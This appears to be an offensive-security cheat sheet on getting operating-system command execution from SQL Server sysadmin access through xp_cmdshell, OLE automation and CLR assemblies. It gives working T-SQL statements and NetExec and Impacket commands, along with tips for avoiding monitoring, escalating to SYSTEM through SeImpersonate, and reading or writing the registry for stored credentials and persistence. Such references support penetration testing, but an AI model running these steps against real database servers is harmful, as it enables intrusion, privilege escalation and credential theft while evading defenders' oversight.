With sysadmin (or a path to it through impersonation or linked servers), SQL Server will run operating-system commands as its service account. There are three main sinks; xp_cmdshell is the direct one, OLE automation and CLR are the fallbacks when it is locked down or watched.
xp_cmdshell#
Disabled by default, but a sysadmin re-enables it in two statements:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
# Impacket and NetExec wrap the enable-and-run
mssqlclient.py ... # then: enable_xp_cmdshell / xp_cmdshell whoami
nxc mssql <target> -u sa -p pass --local-auth -x "whoami" # -X for a PowerShell payload
OLE automation#
When xp_cmdshell is unavailable, the OLE automation procedures instantiate a WScript shell to run commands:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @o INT;
EXEC sp_OACreate 'WScript.Shell', @o OUT;
EXEC sp_OAMethod @o, 'Run', NULL, 'cmd /c whoami > C:\out.txt';
CLR assemblies#
A sysadmin can load a .NET assembly that exposes a procedure running code in-process, which avoids spawning cmd.exe and is quieter:
-- load a CLR assembly from a hex blob or a reachable path, then call its procedure
-- tools: Invoke-SqlServer / PowerUpSQL Invoke-SQLOSCmd handle the assembly plumbing
Exploitation notes#
- Commands run as the SQL Server service account, so the payoff depends on that account: often a low service account (pivot via token impersonation, since it usually holds
SeImpersonate) or sometimesLocalSystemor a domain account. - Prefer CLR or OLE where
xp_cmdshellis monitored or policy-blocked; all three need sysadmin, so reach sysadmin first via impersonation or linked servers. PowerUpSQLInvoke-SQLOSCmdexecutes specifically through xp_cmdshell; where that is blocked but OLE or CLR is usable, run those statements directly rather than relying on it.- Command execution plus the service account's
SeImpersonateis the standard MSSQL-to-SYSTEM chain on the host. - Beyond execution, a sysadmin can read and write the Windows registry with
xp_regread/xp_regwrite(service-account secrets, stored credentials, autoruns), a quieter credential-access and persistence primitive.
Tools#
- PowerUpSQL (
Invoke-SQLOSCmd): OS command execution through xp_cmdshell (use the OLE/CLR statements directly where xp_cmdshell is blocked). - Impacket
mssqlclient.py(enable_xp_cmdshell): interactive enable-and-run. - NetExec
mssql(-x/-X): command and PowerShell execution from the network.